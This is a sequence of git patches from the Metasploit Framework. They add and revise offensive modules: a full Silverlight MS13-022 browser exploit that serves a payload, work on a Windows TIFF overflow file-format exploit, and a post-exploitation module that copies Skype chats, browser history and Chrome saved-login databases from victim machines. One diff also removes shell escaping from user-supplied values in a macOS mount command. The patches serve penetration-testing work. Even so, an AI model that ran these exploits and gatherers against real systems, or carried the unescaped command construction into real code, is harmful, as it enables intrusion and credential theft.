     # Go through the list, find the saved Network Password descriptions
     # and their corresponding ptcl and srvr attributes
     list = []
-    for x in 0..tmp.length-1
-      if tmp[x] =~ /"desc"<blob>="Network Password"/ && x < tmp.length-3
+    for x in 0..lines.length-1
+      if lines[x] =~ /"desc"<blob>="Network Password"/ && x < lines.length-3
         # Remove everything up to the double-quote after the equal sign,
         # and also the trailing double-quote
-        if tmp[x+1] =~ /^.*\=\"(.*)\w*\"\w*$/
+        if lines[x+1].match(REGEX_PROTO)
           protocol = $1
-          if protocol =~ /smb|nfs|cifs|ftp|afp/ && tmp[x+2] =~ /^.*\=\"(.*)\"\w*$/
+          if protocol =~ /smb|nfs|cifs|ftp|afp/ && lines[x+2].match(REGEX_SERVER)
             server = $1
             list.push(protocol + "\t" + server)
           end
@@ -187,36 +184,23 @@ class Metasploit3 < Msf::Post
     data = cmd_exec("defaults read #{recent_plist_path} RecentServers")
 
     # Grep for Name
-    list = []
-    lines = data.lines
-    lines.each do |line|
-      line.strip!
-      if line =~ /^Name = \"(.*)\"\;$/
-        list.push($1) unless list.include?($1)
-      elsif line =~ /^Name = (.*)\;$/
-        list.push($1) unless list.include?($1)
-      end
-    end
-    return list.sort
+    regexes = [ /^Name = \"(.*)\"\;$/, /^Name = (.*)\;$/ ]
+    list = data.lines.select{ |line| if regexes.any?{ |r| line.strip! =~ r } then $1 end  }.compact.uniq.map(&:strip)
+    return list
   end
 
   def get_mounted_volumes
     vprint_status("ls /Volumes")
     data = cmd_exec("ls /Volumes")
-    list = []
-    lines = data.lines
-    lines.each do |line|
-      line.strip!
-      list << line
-    end
-    return list.sort
+    list = data.lines.map(&:strip).sort
+    return list
   end
 
   def mount
-    share_name = datastore['VOLUME'].shellescape
-    protocol = datastore['PROTOCOL'].shellescape
+    share_name = datastore['VOLUME']
+    protocol = datastore['PROTOCOL']
     print_status("Connecting to #{protocol}://#{share_name}")
-    cmd = "osascript -e 'tell app \"finder\" to mount volume #{protocol}://#{share_name}'"
+    cmd = "osascript -e 'tell app \"finder\" to mount volume \"#{protocol}://#{share_name}\"'"
     vprint_status(cmd)
     cmd_exec(cmd)
   end

From fd009f1e460f7ae2c801224cf4ebae460a4d5650 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Fri, 22 Nov 2013 11:20:21 -0600
Subject: [PATCH 054/217] Update default ruby to 1.9.3-p484 (CVE-2013-4164)

See
https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/
---
 .ruby-version | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.ruby-version b/.ruby-version
index c82eec79ee..7a895c2142 100644
--- a/.ruby-version
+++ b/.ruby-version
@@ -1 +1 @@
-1.9.3-p448
+1.9.3-p484

From 8476ca872e181aae4421a940dee2af039705e12e Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 22 Nov 2013 11:53:57 -0600
Subject: [PATCH 055/217] More progress

---
 .../windows/fileformat/mswin_tiff_overflow.rb | 22 +++++++++++--------
 1 file changed, 13 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index 7210f2f47c..68dc55750d 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -312,13 +312,14 @@ class Metasploit3 < Msf::Exploit::Remote
 
       xml.drawing do
         xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
-          xml.extent({'cx'=>'1', 'cy'=>'1'})
-          xml.effectExtent({'l'=>"1", 't'=>"0", 'r'=>"1", 'b'=>"0"})
-          xml.docPr({'id'=>rid.to_s, 'name' => "drawing #{rid.to_s}"})
-          xml.cNvGraphicFramePr
-          xml['a'].graphic({'xmlns'=>"#{drawingml_schema}/main"}) do
+          xml['wp'].extent({'cx'=>'1', 'cy'=>'1'})
+          xml['wp'].effectExtent({'l'=>"1", 't'=>"0", 'r'=>"1", 'b'=>"0"})
+          xml['wp'].docPr({'id'=>rid.to_s, 'name' => "drawing #{rid.to_s}"})
+          xml['wp'].cNvGraphicFramePr
+
+          xml['a'].graphic do
             xml['a'].graphicData({'uri'=>"#{drawingml_schema}/chart"}) do
-              xml['c'].chart({'xmlns:c'=>"#{drawingml_schema}/chart", 'xmlns:r'=>@schema})
+              xml['c'].chart({'r:id'=>"rId#{rid.to_s}"})
             end
           end
         end
@@ -443,8 +444,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'xmlns:w10' => "urn:schemas-microsoft-com:office:word",
       'xmlns:w'   => "http://schemas.openxmlformats.org/wordprocessingml/2006/main",
       'xmlns:wne' => "http://schemas.microsoft.com/office/word/2006/wordml",
-      'xmlns:a'   => "http://schemas.openxmlformats.org/markup-compatibility/2006",
-      'xmlns:c'   => "http://schemas.openxmlformats.org/markup-compatibility/2006"
+      'xmlns:a'   => "http://schemas.openxmlformats.org/drawingml/2006/main",
+      'xmlns:c'   => "http://schemas.openxmlformats.org/drawingml/2006/chart"
     }
 
     p_attrs_1 = {'w:rsidR' => "00F8254F", 'w:rsidRDefault' => "00D15BD0" }
@@ -490,12 +491,15 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     end
 
+    # Bug in the API causing some graphic nodes (names) not parsed correctly
+    xml = builder.to_xml(:indent => 0)
+
     {
       :id           => (last_rid + 1).to_s,
       :type         => "#{@schema}/officeDocument",
       :fname        => "/word/document.xml",
       :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml",
-      :xml          => builder.to_xml(:indent => 0)
+      :xml          => xml
     }
   end
 

From 768821100916168f3782f72ad4dda60c299e5728 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Fri, 22 Nov 2013 12:14:51 -0600
Subject: [PATCH 056/217] Add a test for CVE-2013-4164. Will crash old Ruby!

If you are not on a recent version of Ruby, you will segfault.
---
 spec/spec_helper.rb | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/spec/spec_helper.rb b/spec/spec_helper.rb
index 459103aba2..0782be429f 100644
--- a/spec/spec_helper.rb
+++ b/spec/spec_helper.rb
@@ -1,4 +1,15 @@
 # -*- coding:binary -*-
+
+# Test Ruby for CVE-2013-4164
+# See https://www.ruby-lang.org/en/news/2013/11/22/heap-overflow-in-floating-point-parsing-cve-2013-4164/
+$cve_2013_4164_tested ||= false
+unless $cve_2013_4164_tested
+  $stdout.puts "\n[*] Testing for CVE-2013-4164. If this crashes, update your Ruby version.\n"
+  10.times { ("1."+"1"*300000).to_f }
+  $cve_2013_4164_tested = true
+  $stdout.puts "[*] Success, Ruby survived the segfaulting test."
+end
+
 require 'rubygems'
 require 'bundler'
 Bundler.require(:default, :test, :db)

From 25b0c86855f92101eb1c849f73573b2b48dc0838 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Fri, 22 Nov 2013 12:21:29 -0600
Subject: [PATCH 057/217] Force Travis to Ruby 1.9.3-p484

---
 .travis.yml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/.travis.yml b/.travis.yml
index 1ae7e19bcf..a89c941644 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -2,6 +2,8 @@ language: ruby
 before_install:
   - sudo apt-get update -qq
   - sudo apt-get install -qq libpcap-dev
+  - rvm stable
+  - rvm reload
 before_script:
   - cp config/database.yml.travis config/database.yml
   - rake db:create
@@ -9,7 +11,7 @@ before_script:
 
 rvm:
   #- '1.8.7'
-  - '1.9.3'
+  - '1.9.3-p484'
 
 notifications:
   irc: "irc.freenode.org#msfnotify"

From 994d4e94c6da9661e86a5eae0e92368f497c772c Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Fri, 22 Nov 2013 12:26:05 -0600
Subject: [PATCH 058/217] Revert "Force Travis to Ruby 1.9.3-p484"

This reverts commit 25b0c86855f92101eb1c849f73573b2b48dc0838.
---
 .travis.yml | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)

diff --git a/.travis.yml b/.travis.yml
index a89c941644..1ae7e19bcf 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -2,8 +2,6 @@ language: ruby
 before_install:
   - sudo apt-get update -qq
   - sudo apt-get install -qq libpcap-dev
-  - rvm stable
-  - rvm reload
 before_script:
   - cp config/database.yml.travis config/database.yml
   - rake db:create
@@ -11,7 +9,7 @@ before_script:
 
 rvm:
   #- '1.8.7'
-  - '1.9.3-p484'
+  - '1.9.3'
 
 notifications:
   irc: "irc.freenode.org#msfnotify"

From b69a67251ffc62896092d199abf91b1286b7b427 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Fri, 22 Nov 2013 12:26:16 -0600
Subject: [PATCH 059/217] Revert CVE-2013-4164 test

This reverts commit 768821100916168f3782f72ad4dda60c299e5728.
---
 spec/spec_helper.rb | 11 -----------
 1 file changed, 11 deletions(-)

diff --git a/spec/spec_helper.rb b/spec/spec_helper.rb
index 0782be429f..459103aba2 100644
--- a/spec/spec_helper.rb
+++ b/spec/spec_helper.rb
@@ -1,15 +1,4 @@
 # -*- coding:binary -*-
-
-# Test Ruby for CVE-2013-4164
-# See https://www.ruby-lang.org/en/news/2013/11/22/heap-overflow-in-floating-point-parsing-cve-2013-4164/
-$cve_2013_4164_tested ||= false
-unless $cve_2013_4164_tested
-  $stdout.puts "\n[*] Testing for CVE-2013-4164. If this crashes, update your Ruby version.\n"
-  10.times { ("1."+"1"*300000).to_f }
-  $cve_2013_4164_tested = true
-  $stdout.puts "[*] Success, Ruby survived the segfaulting test."
-end
-
 require 'rubygems'
 require 'bundler'
 Bundler.require(:default, :test, :db)

From 953a96fc2e5ca50c834bb66f5f059214706f2ba1 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 22 Nov 2013 12:27:10 -0600
Subject: [PATCH 060/217] This one looks promising

---
 modules/exploits/windows/fileformat/mswin_tiff_overflow.rb | 7 +++----
 1 file changed, 3 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index 68dc55750d..590bc1f443 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -167,6 +167,8 @@ class Metasploit3 < Msf::Exploit::Remote
     mscd << [0x00000000].pack('V')      # Total number of sectors for master sector talbe
     mscd << [0x00000000].pack('V')      # SecIDs
     mscd << [0xffffffff].pack('V') * 4 * 59 # SecIDs
+    mscd[0x200, 4]  = [0xfffffffd].pack('V')
+    mscd[0x204, 12] = [0xfffffffe].pack('V') * 3
     mscd << Rex::Text.to_unicode("Root Entry")
     mscd << [0x00000000].pack('V') * 11
     mscd << [0x0016].pack('v')          # Valid range of the previous char array
@@ -491,15 +493,12 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     end
 
-    # Bug in the API causing some graphic nodes (names) not parsed correctly
-    xml = builder.to_xml(:indent => 0)
-
     {
       :id           => (last_rid + 1).to_s,
       :type         => "#{@schema}/officeDocument",
       :fname        => "/word/document.xml",
       :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml",
-      :xml          => xml
+      :xml          => builder.to_xml(:indent => 0)
     }
   end
 

From b742ed13b9433f7bc97bf14cab0ecb973ae2d6d7 Mon Sep 17 00:00:00 2001
From: jonvalt <>
Date: Fri, 22 Nov 2013 12:38:06 -0600
Subject: [PATCH 061/217] junk commit

---
 .../forensics/gather_browser_history.rb       | 160 ++++++++++++++++++
 1 file changed, 160 insertions(+)
 create mode 100644 modules/post/windows/gather/forensics/gather_browser_history.rb

diff --git a/modules/post/windows/gather/forensics/gather_browser_history.rb b/modules/post/windows/gather/forensics/gather_browser_history.rb
new file mode 100644
index 0000000000..00d2758aa1
--- /dev/null
+++ b/modules/post/windows/gather/forensics/gather_browser_history.rb
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'csv'
+require 'msf/core/post/windows/user_profiles'
+require 'msf/core/post/windows/registry'
+
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+  include Msf::Post::Windows::Registry
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name' => 'Windows Gather Skype, Firefox, and Chrome Artifacts',
+        'Description' => %q{'Gathers Skype chat logs, Firefox history, and Chrome History data from the victim machine.'},
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Joshua Harper (@JonValt) <josh at radixtx dot com>'],
+        'Platform' => %w{ win },
+        'SessionTypes' => [ 'meterpreter', 'shell' ]
+      ))
+    register_advanced_options(
+      [
+        # Set as an advanced option since it can only be useful in shell sessions.
+        OptInt.new('TIMEOUT', [true ,'Timeout in seconds when downloading file on a shell session.', 120]),
+      ], self.class)
+  end
+
+  def run
+    print_status("Grabbing user profiles")
+    grab_user_profiles.each do |userprofile|
+      if check_artifact({
+            :path=>userprofile['AppData'],
+            :user=>userprofile['UserName'],
+            :artifact_name=>"skype",
+            :artifact_dir=>"Skype"
+          })
+        download_artifact({
+            :path=>"AppData",
+            :profile=>userprofile,
+            :artifact_name=>"skype",
+            :artifact_dir=>"Skype",
+            :artifact_filename=>"main.db",
+            :artifact_filetype=>"binary/db"
+          })
+      end
+      if check_artifact({
+            :path=>userprofile['AppData'],
+            :user=>userprofile['UserName'],
+            :artifact_name=>"Firefox",
+            :artifact_dir=>"Mozilla"
+          })
+        download_artifact({:path=>"AppData",
+            :profile=>userprofile,
+            :artifact_name=>"Firefox",
+            :artifact_dir=>"Mozilla",
+            :artifact_filename=>"places.sqlite",
+            :artifact_filetype=>"binary/db"
+          })
+      end
+      if check_artifact({
+            :path=>userprofile['LocalAppData'],
+            :user=>userprofile['UserName'],
+            :artifact_name=>"Chrome History",
+            :artifact_dir=>"Google"
+          })
+        download_artifact({
+            :path=>"LocalAppData",
+            :profile=>userprofile,
+            :artifact_name=>"Chrome_History",
+            :artifact_dir=>"Google",
+            :artifact_filename=>"History.",
+            :artifact_filetype=>"binary/db"
+          })
+      end
+      if check_artifact({
+            :path=>userprofile['LocalAppData'],
+            :user=>userprofile['UserName'],
+            :artifact_name=>"Chrome History",
+            :artifact_dir=>"Google"
+          })
+        download_artifact({
+            :path=>"LocalAppData",
+            :profile=>userprofile,
+            :artifact_name=>"Chrome_History",
+            :artifact_dir=>"Google",
+            :artifact_filename=>"Login Data.",
+            :artifact_filetype=>"binary/db"
+          })
+      end
+      if check_artifact({
+            :path=>userprofile['LocalAppData'],
+            :user=>userprofile['UserName'],
+            :artifact_name=>"Chrome History",
+            :artifact_dir=>"Google"
+          })
+        download_artifact({
+            :path=>"LocalAppData",
+            :profile=>userprofile,
+            :artifact_name=>"Chrome_History",
+            :artifact_dir=>"Google",
+            :artifact_filename=>"Archived History.",
+            :artifact_filetype=>"binary/db"
+          })
+      end
+      if check_artifact({
+            :path=>userprofile['LocalAppData'],
+            :user=>userprofile['UserName'],
+            :artifact_name=>"Chrome History",
+            :artifact_dir=>"Google"
+          })
+        download_artifact({
+            :path=>"LocalAppData",
+            :profile=>userprofile,
+            :artifact_name=>"Chrome_History",
+            :artifact_dir=>"Google",
+            :artifact_filename=>"Bookmarks.",
+            :artifact_filetype=>"binary/db"
+          })
+      end
+    end
+  end
+
+  def check_artifact(opts={})
+    print_status("Checking for #{opts[:artifact_name]} artifacts...")
+    dirs = []
+    session.fs.dir.foreach(opts[:path]) do |d|
+      dirs << d
+    end
+    dirs.each do |dir|
+      if dir == opts[:artifact_dir]
+        print_good("#{opts[:artifact_name]} directory found for #{opts[:user]}")
+        return true
+      end
+    end
+    print_error("#{opts[:artifact_name]} directory not found for #{opts[:user]}")
+    return false
+  end
+ 
+  def download_artifact(opts={})
+    file = session.fs.file.search("#{opts[:profile]["#{opts[:path]}"]}\\#{opts[:artifact_dir]}","#{opts[:artifact_filename]}",true)
+    file.each do |db|
+      guid = db['path'].split ('\\')
+      file_loc = store_local("artifact","#{opts[:artifact_filetype]}",session,"#{opts[:profile]['UserName']}_#{opts[:artifact_name]}_#{guid.last}_#{opts[:artifact_filename]}")
+      maindb = "#{db['path']}#{session.fs.file.separator}#{db['name']}"
+      print_status("Downloading #{maindb}")
+      session.fs.file.download_file(file_loc,maindb)
+      print_good("#{opts[:artifact_name]} artifact file saved to #{file_loc}")
+print_status("Hello from 'return file_loc'")
+      return file_loc
+print_status("Hello from AFTER 'return file_loc'!")
+    end
+  end
+end

From 9addd374588099b1a2ca0903e8e60daacf7e69d4 Mon Sep 17 00:00:00 2001
From: jonvalt <>
Date: Fri, 22 Nov 2013 14:03:54 -0600
Subject: [PATCH 062/217] minor changes:

s/grab/gather/g
---
 .../gather/forensics/gather_browser_history.rb    | 15 +++++----------
 1 file changed, 5 insertions(+), 10 deletions(-)

diff --git a/modules/post/windows/gather/forensics/gather_browser_history.rb b/modules/post/windows/gather/forensics/gather_browser_history.rb
index 00d2758aa1..f25ecf897a 100644
--- a/modules/post/windows/gather/forensics/gather_browser_history.rb
+++ b/modules/post/windows/gather/forensics/gather_browser_history.rb
@@ -23,17 +23,13 @@ class Metasploit3 < Msf::Post
         'License' => MSF_LICENSE,
         'Author' => [ 'Joshua Harper (@JonValt) <josh at radixtx dot com>'],
         'Platform' => %w{ win },
-        'SessionTypes' => [ 'meterpreter', 'shell' ]
+        'SessionTypes' => [ 'meterpreter' ]
       ))
-    register_advanced_options(
-      [
-        # Set as an advanced option since it can only be useful in shell sessions.
-        OptInt.new('TIMEOUT', [true ,'Timeout in seconds when downloading file on a shell session.', 120]),
-      ], self.class)
+    register_advanced_options([], self.class)
   end
 
   def run
-    print_status("Grabbing user profiles")
+    print_status("Gathering user profiles")
     grab_user_profiles.each do |userprofile|
       if check_artifact({
             :path=>userprofile['AppData'],
@@ -139,7 +135,7 @@ class Metasploit3 < Msf::Post
         return true
       end
     end
-    print_error("#{opts[:artifact_name]} directory not found for #{opts[:user]}")
+    print_good("#{opts[:artifact_name]} directory not found for #{opts[:user]}")
     return false
   end
  
@@ -147,14 +143,13 @@ class Metasploit3 < Msf::Post
     file = session.fs.file.search("#{opts[:profile]["#{opts[:path]}"]}\\#{opts[:artifact_dir]}","#{opts[:artifact_filename]}",true)
     file.each do |db|
       guid = db['path'].split ('\\')
+      # Using store_local for full control of output filename.  Forensics software can be picky about the files it's given.
       file_loc = store_local("artifact","#{opts[:artifact_filetype]}",session,"#{opts[:profile]['UserName']}_#{opts[:artifact_name]}_#{guid.last}_#{opts[:artifact_filename]}")
       maindb = "#{db['path']}#{session.fs.file.separator}#{db['name']}"
       print_status("Downloading #{maindb}")
       session.fs.file.download_file(file_loc,maindb)
       print_good("#{opts[:artifact_name]} artifact file saved to #{file_loc}")
-print_status("Hello from 'return file_loc'")
       return file_loc
-print_status("Hello from AFTER 'return file_loc'!")
     end
   end
 end

From 52a3b93f2428808f59cffd946986cbbb7ac32b2b Mon Sep 17 00:00:00 2001
From: jonvalt <>
Date: Fri, 22 Nov 2013 14:17:20 -0600
Subject: [PATCH 063/217] Hopefully final commit.

ALL issues mentioned by todb in https://github.com/rapid7/metasploit-framework/pull/2663/ have been fixed or erased.

Only exception is comment https://github.com/rapid7/metasploit-framework/pull/2663/#discussion_r7837036 which if omitted as recommended, breaks the module.
---
 modules/post/windows/gather/forensics/gather_browser_history.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/windows/gather/forensics/gather_browser_history.rb b/modules/post/windows/gather/forensics/gather_browser_history.rb
index f25ecf897a..8f2117225b 100644
--- a/modules/post/windows/gather/forensics/gather_browser_history.rb
+++ b/modules/post/windows/gather/forensics/gather_browser_history.rb
@@ -138,7 +138,7 @@ class Metasploit3 < Msf::Post
     print_good("#{opts[:artifact_name]} directory not found for #{opts[:user]}")
     return false
   end
- 
+
   def download_artifact(opts={})
     file = session.fs.file.search("#{opts[:profile]["#{opts[:path]}"]}\\#{opts[:artifact_dir]}","#{opts[:artifact_filename]}",true)
     file.each do |db|

From b712c774131f02fc7cb3d79522676b5717e5504a Mon Sep 17 00:00:00 2001
From: jonvalt <>
Date: Fri, 22 Nov 2013 14:37:54 -0600
Subject: [PATCH 064/217] capitalization

---
 modules/post/windows/gather/forensics/gather_browser_history.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/windows/gather/forensics/gather_browser_history.rb b/modules/post/windows/gather/forensics/gather_browser_history.rb
index 8f2117225b..a1f211ce31 100644
--- a/modules/post/windows/gather/forensics/gather_browser_history.rb
+++ b/modules/post/windows/gather/forensics/gather_browser_history.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Post
   def initialize(info={})
     super( update_info( info,
         'Name' => 'Windows Gather Skype, Firefox, and Chrome Artifacts',
-        'Description' => %q{'Gathers Skype chat logs, Firefox history, and Chrome History data from the victim machine.'},
+        'Description' => %q{'Gathers Skype chat logs, Firefox history, and Chrome history data from the victim machine.'},
         'License' => MSF_LICENSE,
         'Author' => [ 'Joshua Harper (@JonValt) <josh at radixtx dot com>'],
         'Platform' => %w{ win },

From 266de2d27f97bd89fc83bcbedacc480d239921ab Mon Sep 17 00:00:00 2001
From: Karn Ganeshen <KarnGaneshen@gmail.com>
Date: Sat, 23 Nov 2013 00:01:03 +0300
Subject: [PATCH 065/217] Updated

---
 ...penmind_messageos_login => openmind_messageos_login.rb} | 7 +++----
 1 file changed, 3 insertions(+), 4 deletions(-)
 rename modules/auxiliary/scanner/http/{openmind_messageos_login => openmind_messageos_login.rb} (91%)

diff --git a/modules/auxiliary/scanner/http/openmind_messageos_login b/modules/auxiliary/scanner/http/openmind_messageos_login.rb
similarity index 91%
rename from modules/auxiliary/scanner/http/openmind_messageos_login
rename to modules/auxiliary/scanner/http/openmind_messageos_login.rb
index 495eb36b9f..1d1f47a993 100644
--- a/modules/auxiliary/scanner/http/openmind_messageos_login
+++ b/modules/auxiliary/scanner/http/openmind_messageos_login.rb
@@ -29,11 +29,10 @@ class Metasploit3 < Msf::Auxiliary
 
     register_options(
       [
-        OptBool.new('SSL', [ false, "Negotiate SSL for outgoing connections", false]),
         Opt::RPORT(8888),
-        OptString.new('TARGETURI', [true, "URI for Web login. Default: /provision/index.php", "/provision/index.php"]),
-        OptString.new('USERNAME', [true, "A specific username to authenticate as, default 'admin'", "admin"]),
-        OptString.new('PASSWORD', [true, "A specific password to authenticate with, deault 'admin'", "admin"])
+        OptString.new('TARGETURI', [true, "URI for Web login", "/provision/index.php"]),
+        OptString.new('USERNAME', [true, "A specific username to authenticate as", "admin"]),
+        OptString.new('PASSWORD', [true, "A specific password to authenticate with", "admin"])
       ], self.class)
   end
 

From a7ad107e8833414c12bc4cb324b661ab7bee6888 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 22 Nov 2013 16:41:56 -0600
Subject: [PATCH 066/217] Add ruby code for ms13-022

---
 .../ms13_022_silverlight_script_object.rb     | 153 ++++++++++++++++++
 1 file changed, 153 insertions(+)
 create mode 100644 modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb

diff --git a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
new file mode 100644
index 0000000000..5b8e8cba45
--- /dev/null
+++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
@@ -0,0 +1,153 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  MANIFEST = <<-EOS
+<Deployment xmlns="http://schemas.microsoft.com/client/2007/deployment" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" EntryPointAssembly="SilverApp1" EntryPointType="SilverApp1.App" RuntimeVersion="4.0.50826.0">
+  <Deployment.Parts>
+    <AssemblyPart x:Name="SilverApp1" Source="SilverApp1.dll" />
+  </Deployment.Parts>
+</Deployment>
+  EOS
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "MS12-022 Microsoft Internet Explorer COALineDashStyleArray Unsafe Memory Access",
+      'Description'    => %q{
+        This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on
+        the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an
+        unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible
+        to dereference arbitrary memory which easily leverages to arbitrary code execution. In order
+        to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class
+        from System.Windows.dll. This module has been tested successfully on IE6 - IE8, Windows XP
+        SP3 / Windows 7 SP1 on both x32 and x64 architectures.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'James Forshaw',   # RCE Vulnerability discovery
+          'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work
+          'juan vazquez'     # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2013-0074' ],
+          [ 'CVE', '2013-3896' ],
+          [ 'OSVDB', '91147' ],
+          [ 'OSVDB', '98223' ],
+          [ 'BID', '58327' ],
+          [ 'BID', '62793' ],
+          [ 'MSB', 'MS13-022' ],
+          [ 'MSB', 'MS13-087' ],
+          [ 'URL', 'http://packetstormsecurity.com/files/123731/' ]
+        ],
+      'DefaultOptions'  =>
+        {
+          'InitialAutoRunScript' => 'migrate -f',
+          'EXITFUNC'             => 'thread'
+        },
+      'Platform'       => 'win',
+      'Arch'           => [ARCH_X86, ARCH_X86_64],
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :os_name => Msf::OperatingSystems::WINDOWS,
+          :ua_name => Msf::HttpClients::IE
+        },
+      'Targets'        =>
+        [
+          [ 'Windows x86',
+            {
+              'arch'      => ARCH_X86
+            }
+          ],
+          [ 'Windows x64',
+            {
+              'arch'      => ARCH_X86_64
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Mar 12 2013",
+      'DefaultTarget'  => 0))
+
+  end
+
+  def setup
+    @xap_name = "#{rand_text_alpha(5 + rand(5))}.xap"
+    @dll_name = "#{rand_text_alpha(5 + rand(5))}.dll"
+    File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2013-0074", "SilverApp1.xap" ), "rb") { |f| @xap = f.read }
+    File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2013-0074", "SilverApp1.dll" ), "rb") { |f| @dll = f.read }
+    @xaml = MANIFEST.gsub(/SilverApp1\.dll/, @dll_name)
+    super
+  end
+
+  def exploit_template(cli, target_info)
+
+    my_payload = get_payload(cli, target_info)
+
+    # Align to 4 bytes the x86 payload
+    if target_info[:arch] == ARCH_X86
+      while my_payload.length % 4 != 0
+        my_payload = "\x90" + my_payload
+      end
+    end
+
+    my_payload = Rex::Text.encode_base64(my_payload)
+
+    html_template = <<-EOF
+<html>
+<!-- saved from url=(0014)about:internet -->
+<head>
+  <title>Silverlight Application</title>
+  <style type="text/css">
+    html, body { height: 100%; overflow: auto; }
+    body { padding: 0; margin: 0; }
+    #form1 { height: 99%; }
+    #silverlightControlHost { text-align:center; }
+  </style>
+</head>
+<body>
+  <form id="form1" runat="server" >
+    <div id="silverlightControlHost">
+    <object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%">
+      <param name="source" value="<%= @xap_name %>"/>
+      <param name="background" value="white" />
+      <param name="InitParams" value="payload=<%= my_payload %>" />
+    </object>
+    </div>
+  </form>
+</body>
+</html>
+EOF
+
+    return html_template, binding()
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("request: #{request.uri}")
+    if request.uri =~ /#{@xap_name}$/
+      print_status("Sending XAP...")
+      send_response(cli, @xap, { 'Content-Type' => 'application/x-silverlight-2', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })
+    elsif request.uri =~ /#{@dll_name}$/
+      print_status("Sending DLL...")
+      send_response(cli, @dll, { 'Content-Type' => 'application/octect-stream', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })
+    elsif request.uri =~ /AppManifest.xaml$/
+      print_status("Sending XAML...")
+      send_response(cli, @xaml, { 'Content-Type' => 'text/xaml', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache' })
+    else
+      print_status("Sending HTML...")
+      send_exploit_html(cli, exploit_template(cli, target_info))
+    end
+  end
+
+end
+

From 136c18c070a928f709d9c77533a5b6b0ee08dcd9 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 22 Nov 2013 16:45:07 -0600
Subject: [PATCH 067/217] Add binary objects for MS13-022

---
 data/exploits/cve-2013-0074/SilverApp1.dll | Bin 0 -> 17408 bytes
 data/exploits/cve-2013-0074/SilverApp1.xap | Bin 0 -> 8380 bytes
 2 files changed, 0 insertions(+), 0 deletions(-)
 create mode 100755 data/exploits/cve-2013-0074/SilverApp1.dll
 create mode 100755 data/exploits/cve-2013-0074/SilverApp1.xap

diff --git a/data/exploits/cve-2013-0074/SilverApp1.dll b/data/exploits/cve-2013-0074/SilverApp1.dll
new file mode 100755
index 0000000000000000000000000000000000000000..84211975c9cfdd68a240de14ad31f602f5f1e07c
GIT binary patch
literal 17408
